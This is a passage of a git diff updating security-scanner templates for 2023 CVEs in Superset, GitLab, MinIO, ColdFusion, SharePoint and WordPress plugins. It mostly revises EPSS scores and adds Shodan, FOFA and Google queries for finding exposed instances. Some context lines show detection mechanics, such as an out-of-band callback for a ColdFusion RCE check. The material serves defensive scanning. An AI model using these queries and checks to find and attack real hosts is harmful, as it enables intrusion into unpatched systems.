a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 62f3c07e1d..3a9f87791f 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -20,15 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27524 cwe-id: CWE-1188 - epss-score: 0.97224 - epss-percentile: 0.99822 + epss-score: 0.97095 + epss-percentile: 0.99777 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true max-request: 45 vendor: apache product: superset - shodan-query: html:"Apache Superset" + shodan-query: + - html:"Apache Superset" + - http.favicon.hash:1582430156 + - http.html:"apache superset" + fofa-query: + - body="apache superset" + - icon_hash=1582430156 tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev http: @@ -71,4 +77,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e9873ef2152bc24254405f66645dfe7d2f2126dd9d33407920ae3ac8b62a0f6e022100ea81d9a3cfab7defcab09ea9b1fc09ccb7090879ae84b763241e3f4c7896beac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220228b10a8077e93af4bd15d1409a8aad1deeb3ab9d7a80d7e2152203e63aab184022100d0f1ed1cdeb060d4ba7b7c7d2ee4cba8520828356410f83d4d1a131a6feb8583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index b032894442..8225a3ae90 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 - epss-score: 0.18807 - epss-percentile: 0.96117 + epss-score: 0.16542 + epss-percentile: 0.96007 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -62,4 +62,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221008e004c348a677bde325cd7abafaf76c6c1c5598d263de7b08ffedf49727b2bdb022051961d005e215d78fbc7abd5a6e925cf4a14ae704d246efec0d8522a611ea34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e06b609fa75c61cfa4d104be047ab72148eb1f763831efbe742adcc8f53a159d02200e9faa3e0761679c4a28dc1848048b2b73bce8f1fd34848e8471ff1103f0b6f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 17d60d99f0..706e1d97ce 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27639 cwe-id: CWE-22 - epss-score: 0.04002 - epss-percentile: 0.9185 + epss-score: 0.04552 + epss-percentile: 0.92497 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:* metadata: verified: true @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009203ff14f4788be7f710de96ec1e65ac2311d0637c4281a015d9226ca1709ea2022100a98a180fc53a625defdcb5d20cf9af65a80367a6b3038691639b348e439fcf35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220264ec173015f4ea1e9fb57f0cdf16a11941fa1565929316826a6469a7f26356b022100f9d06900340addad7bbbaa2d4df42eb4966fff7fe48485094749dff3fef84e7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 2d36abfdb0..b70e7ae6a4 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27640 cwe-id: CWE-22 - epss-score: 0.04002 - epss-percentile: 0.9185 + epss-score: 0.04552 + epss-percentile: 0.92497 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 @@ -38,4 +38,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(base64_decode(body), "PrestaShop", "") && contains(body_2, "facebook_urls")' condition: and -# digest: 4a0a00473045022100fbf4beb7caa46ad11a7ce26fdbfaa88016713b04d71ece5c2635a31913986a8a022003212b2b9c49bf77654e33bcb134a805bf48735fe3d357705f393d0f741b050e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e3e768c0de86a746c4efad68576e82bc1fa30922c43c8345f523acf95f0f30e0221008f34d738ed0acf80b92b4989211cd0d3d817649036f5e72399ffc23ec8159866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 7a6e334e77..ea887070cf 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -14,13 +14,15 @@ info: - https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2780 - https://github.com/mlflow/mlflow/commit/fae77a525dd908c56d6204a4cef1c1c75b4e9857 + - https://github.com/Ostorlab/KEV + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2780 cwe-id: CWE-29 - epss-score: 0.0217 - epss-percentile: 0.88199 + epss-score: 0.04145 + epss-percentile: 0.92175 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,10 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: @@ -66,4 +72,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a00483046022100b9f3f94f8eac8f481fa37610517d4174d804c15fb6c2366af1454af3e67d8f7f022100e00fda96533e49cc81cd52e25a7d17b134bf5201a894e857e353238bed1010fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100803bd551a319393f56d5aae8e1a5f4b50669875f42dfffcf37671598462004d1022049f95322641e98ebee3e86be573642b94487e3b09e2ae104fbe8ac3fe71a2dac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 137d883c40..c716a7e7ed 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-27922 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44627 + epss-score: 0.00151 + epss-percentile: 0.51292 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: thenewsletterplugin product: newsletter framework: wordpress + shodan-query: http.html:/wp-content/plugins/newsletter/ + fofa-query: body=/wp-content/plugins/newsletter/ publicwww-query: /wp-content/plugins/newsletter/ tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin @@ -48,4 +50,4 @@ http: - 'contains(tolower(body_2), "_newsletter_")' - 'contains(body_2, ">")' condition: and -# digest: 4a0a00473045022100e506db446bbe84801062c7573c8d84d6ac3ac2ac861ce5c6e47276cdbfb77f59022037128f43f6e7c992b7095c03a9f8b44e439c994df9f4e8ad1656fd84df42dad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9167be2b724059df7c707ba66c0e23021841497843387e22cea0938486d9c22022100b72c351c3b3cd00ab824a438f1cb818d13fbcabf2a0980ae0e165e839b80686a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index be8fddcd78..3b3a041d09 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-2796 cwe-id: CWE-862 - epss-score: 0.06666 - epss-percentile: 0.93671 + epss-score: 0.03205 + epss-percentile: 0.91193 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,8 +29,17 @@ info: vendor: myeventon product: eventon framework: wordpress - shodan-query: 'vuln:CVE-2023-2796' - fofa-query: "wp-content/plugins/eventon/" + shodan-query: + - 'vuln:CVE-2023-2796' + - http.html:/wp-content/plugins/eventon-lite/ + - http.html:/wp-content/plugins/eventon/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - /wp-content/plugins/eventon/ + - /wp-content/plugins/eventon-lite/ google-query: inurl:"/wp-content/plugins/eventon/" tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon @@ -56,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096c8ac8513c2959653cc0dbb1254ba29a23c8f656c9386fc58765c9cdfc94a3a022100e79e136345ab9f545e2ae7c9bddddd959e9663aa61fd706c65902efa636d7c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220318de299ca2c8ec9c2bf4cab89f4d98130eb585012a8c03089ff40a74a73fbfe022100f4b9a62a0616c3923b13fb92708b26730c78d499aeea95b8cb059b823818a01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 9d5d3d5ce8..fbeb5c48d0 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28121 cwe-id: CWE-287 - epss-score: 0.92977 - epss-percentile: 0.9898 + epss-score: 0.94133 + epss-percentile: 0.99162 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: automattic product: woocommerce_payments framework: wordpress + shodan-query: http.html:/wp-content/plugins/woocommerce-payments + fofa-query: body=/wp-content/plugins/woocommerce-payments publicwww-query: /wp-content/plugins/woocommerce-payments google-query: inurl:/wp-content/plugins/woocommerce-payments tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic @@ -72,4 +74,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 4a0a0047304502201f8fb3d0297a76be68c1aaf7e1947bdcc2d20b4194a143aed488388dda746e1b022100eba2f04ded607ea70367c52c9db1c815ddcf252eb554d4b7413373f5073c53be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220628cd93a9f24e6da21aa191838a4414fde4b236271358e675d6292e2cfd6d9c60220242c94de0f75a7e3169ec197bf0a52235bf43e44525fe668bb487845ec35c26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index c35c2de2ca..a2c633d558 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2813 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44236 + epss-score: 0.00127 + epss-percentile: 0.47427 cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100867ffb49a0eda2059b75af70ac9ec0eda4767fde5735118fc96a82a2276abbeb022009ab8b1e54d2866629f2bc73bd048266c2f69b84c1c82c83d02e824b7ad2bae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220748f6543ee77c349ea3b0c947703b6dddbefb5ef22d0d1f526df20906e14a39c022100df4ecac49f01e90b8646b10d421ba2ce78103f5e5e463bd9ac3a969625144f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 1627b69968..9832ceaad6 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -20,14 +20,17 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2822 cwe-id: CWE-79 - epss-score: 0.03167 - epss-percentile: 0.90173 + epss-score: 0.05264 + epss-percentile: 0.9303 cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ellucian product: ethos_identity - shodan-query: html:"Ellucian Company" + shodan-query: + - html:"Ellucian Company" + - http.html:"ellucian company" + fofa-query: body="ellucian company" google-query: "login with ellucian ethos identity" tags: cve2023,cve,cas,xss,ellucian @@ -48,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032320b6050dff9ab27355a70a59fc91e1a93cbcc3b7baf66112f6c7d2338fb980221009fecbd343a9c563dca53df1617986c480cc2132911bcf89cdfb687ecd9590ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ae64bd3cc36ccd3c52debfd02f43bf19862246f1fd8ef1b705625959d341f8a022100c90f789a33e2667c2fe0f33bd9110d6cdae42c665fc455452870f4c553772a28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 1075e2abe9..ac7c55eebe 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -19,15 +19,20 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 - epss-score: 0.09134 - epss-percentile: 0.94495 + epss-score: 0.12203 + epss-percentile: 0.95384 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true max-request: 16 vendor: gitlab product: gitlab - shodan-query: title:"Gitlab" + shodan-query: + - title:"Gitlab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2023,cve,gitlab,lfi,authenticated,intrusive variables: data: "{{rand_base(5)}}" @@ -210,4 +215,4 @@ http: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body -# digest: 4a0a00473045022100ce74731d4f03315a39203e3aa3775a80c5a82171b15cb8251c13b84816f869a502200e2fc502e7a3ab3a6d1d51fb7acb0c6a69777c3fb805501cc36ffdd30e3d4f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfd3431d04aa76f4f656e43eb506273387a8299167937a29af634da664383762022043221d39d47a5c3aff4ea35ebd7ca48af5ba36ec2866494452f9b42702206196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index c2a470fbef..b9990e4810 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -15,20 +15,26 @@ info: - https://apsystems.com - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2023-28343 + - https://github.com/hba343434/CVE-2023-28343 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-28343 cwe-id: CWE-78 - epss-score: 0.32424 - epss-percentile: 0.96608 + epss-score: 0.84636 + epss-percentile: 0.98506 cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apsystems product: energy_communication_unit_firmware - shodan-query: title:"Altenergy Power Control Software" - google-query: intitle:"Altenergy Power Control Software" + shodan-query: + - title:"Altenergy Power Control Software" + - http.title:"altenergy power control software" + fofa-query: title="altenergy power control software" + google-query: + - intitle:"Altenergy Power Control Software" + - intitle:"altenergy power control software" tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems http: @@ -63,4 +69,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206320054830cbf1ad38ede41ae779a7b91200b4c6551c8237690c44271c9427480220599f337a011a66a04ef3cf978324a583550dcb6ddf4d951d27099781fa04bb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017d3b24a6ca0d2839916b9f74f0f246b9245b3cc54f412eed73fcb61e4ee800202200adba4b62cafffe2f6b959eb2efa0a9b06442f757dfa2ac365f31dec9192d724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 19839d49a6..1fbddebaf3 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -20,16 +20,27 @@ info: cvss-score: 7.5 cve-id: CVE-2023-28432 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.14173 - epss-percentile: 0.95219 + epss-score: 0.93873 + epss-percentile: 0.9913 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: minio product: minio - shodan-query: title:"Minio Console" - fofa-query: app="Minio" + shodan-query: + - title:"Minio Console" + - http.title:"minio browser" + - cpe:"cpe:2.3:a:minio:minio" + - http.title:"minio console" + fofa-query: + - app="Minio" + - app="minio" + - title="minio browser" + - title="minio console" + google-query: + - intitle:"minio browser" + - intitle:"minio console" tags: cve,cve2023,minio,console,exposure,kev http: @@ -57,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc34538c0cf40fb3489d8f091c41bcf45f66c43266a4c6a2136aef40acbe67b702200d93d6082e5e272bc01f1e8222ec9521c32be40f912837b32aa6c0e6dcd75a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204918fcacd2dd44975dd3bc7b60d45dabff1ae1ab08929be54428b57a9a5d953c022070c97f7fed976c184f8c5b4f10b28dd36fb1acdbe6eb625b45b272ce39401e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index f4c634ca3c..daf25ee931 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -20,16 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28662 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31593 + epss-score: 0.01065 + epss-percentile: 0.8414 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: codemenschen product: gift_vouchers framework: wordpress + shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" - tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher + tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen flow: http(1) && http(2) http: @@ -59,4 +60,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 490a00463044022021b0065afd452b596019be1f29280c7188acefb68b151f4424790005959092ce0220570d61411787677f1f9159c72796d6bda6e7f3213de0c8314053f75bea9749bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afa8558e60f3a24e5c759b1c66eaa53fe541909c23b8a9474cd83859af83a17402203bd5c9b2dc67d75e6a403a686a29689ed5be4fc63294981c5fe8107ca0a8275b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 59c897347a..12a44c9543 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 - https://nvd.nist.gov/vuln/detail/CVE-2023-28665 + - https://github.com/JoshuaMart/JoshuaMart + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-28665 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38107 + epss-score: 0.00092 + epss-percentile: 0.39168 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -48,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "pagination\":")' condition: and -# digest: 490a0046304402204eaa8609f06c3eefd7564d1851a570331a2ac0bdf7ea82a8c2c34713f0b076f302201c7005deb51e36e71ebc1d754186d83f8bb170a0db558b3f6e3640044d4b2df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eda48bd92500604d2c7f795dc9f29ad02cbd296ff04dd078f0ad9d0e756275d00221009f72e58aa25cb6db4550d529e6afade4404ed735bba95f58e3653646bafc1558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index f8d3819e51..fb1465e52f 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-29084 cwe-id: CWE-77 - epss-score: 0.45632 - epss-percentile: 0.97324 + epss-score: 0.37079 + epss-percentile: 0.97178 cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: max-request: 3 @@ -79,4 +79,4 @@ http: kval: - admpcsrf part: header -# digest: 4a0a00473045022002ea2f37839931bbb9a9c24fbf58223344569d7d295c6bd5820a686bf488e79e022100c8f6cf28389ef9d5215945629bfaefe1adc0cc3089553c0b049600c78a8be185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b40c67a84b05f52a1cc250c89d9d44375d1a0c33d9f1bc54e9d63819b04e2e00220698ec8d0a6e93ac02207ffb5042b97f54896736e55568b992c616c8dc5924bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 3dd5911411..4459074dfd 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -21,15 +21,23 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.75811 - epss-percentile: 0.97904 + epss-score: 0.94803 + epss-percentile: 0.99269 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: @@ -49,4 +57,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 4b0a00483046022100854b6eedcf29b9f4407257626ca8289e18e931c840b7de9f4b781403aa4f3a30022100feffcad1c0d953b462a696ee3037425fdf8f9135d309379ed44a08c874fc6607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca404bb788ee99d73bae3af87c527baa9ea28205f053f9421747d5dcaec661de022100cd744886e5ac523b6e265391565b850abd75ec30a28faccd1a01ba9157be31cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 7bbaaffeb2..5bf1da9a13 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -21,15 +21,23 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29300 cwe-id: CWE-502 - epss-score: 0.96369 - epss-percentile: 0.99526 + epss-score: 0.9695 + epss-percentile: 0.99724 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: callback: "{{interactsh-url}}" @@ -50,4 +58,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 4b0a0048304602210082b4c6e19acbd6bc2d2776e029a0c8543657d42b874ca648fef7b0cf47d5dd43022100d87b306d094f7b7d7be74eb279feb8df0607d5454f6bf71f832f9259e2297d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203712c3e6d9bf145113c7e3754c7f090fa138024a13a265a0477b89b052d66d410220056aaa4e34b2de2079842b08d7fa6f30e7f7aa401cc7766e4e835b019e6b3ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index a7ef387adf..d153654f59 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -16,16 +16,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-29357 - epss-score: 0.10699 - epss-percentile: 0.9456 + epss-score: 0.82086 + epss-percentile: 0.9838 cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: microsoft product: sharepoint_server - shodan-query: http.headers_hash:-1968878704 - fofa-query: app="Microsoft-SharePoint" + shodan-query: + - http.headers_hash:-1968878704 + - cpe:"cpe:2.3:a:microsoft:sharepoint_server" + fofa-query: + - app="Microsoft-SharePoint" + - app="microsoft-sharepoint" tags: cve,cve2023,microsoft,sharepoint_server,kev variables: client_id: "00000003-0000-0ff1-ce00-000000000000" @@ -63,4 +67,4 @@ http: - Email - IsSiteAdmin condition: and -# digest: 4a0a00473045022100a58b5e92e169683723b78b9760e3fad647f399485f44d9584acd92634703bd4002207541b9a7ffa8755cb4b72e225027d86fd2dfccaae6168bf6e3428abcdad5ef60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e5885208c05b6d7691f6472872c90f7bd98934d49cf8acc2fe54dc7af494a5a022039ac89a839d6dade6f9332a46b69101efd08e8aa30c7ce99d51ad56a9d6c4416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index cb8b18243d..b02f5ffa0d 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29439 cwe-id: CWE-79 - epss-score: 0.00087 - epss-percentile: 0.35426 + epss-score: 0.00161 + epss-percentile: 0.52668 cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -26,6 +26,8 @@ info: vendor: fooplugins product: foogallery framework: wordpress + shodan-query: http.html:/wp-content/plugins/foogallery/ + fofa-query: body=/wp-content/plugins/foogallery/ publicwww-query: "/wp-content/plugins/foogallery/" tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins @@ -58,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051404fd5879c74f26f3e3d20328728775676899601fe56240a8c3865b521c780022100c0508c953de3425517b071c0abbd29036e2b125ba1af7a21b20557e1107caf9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203a35033a9084161b8e269f87a994abd179878f15d72253d472fb749ac232026b022100efc52768b3bbb3b843a30408c2efa8845dd476bfb311d1d56ca5b5899f15218a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index b511f09fb5..4ac2dce220 100644 --- 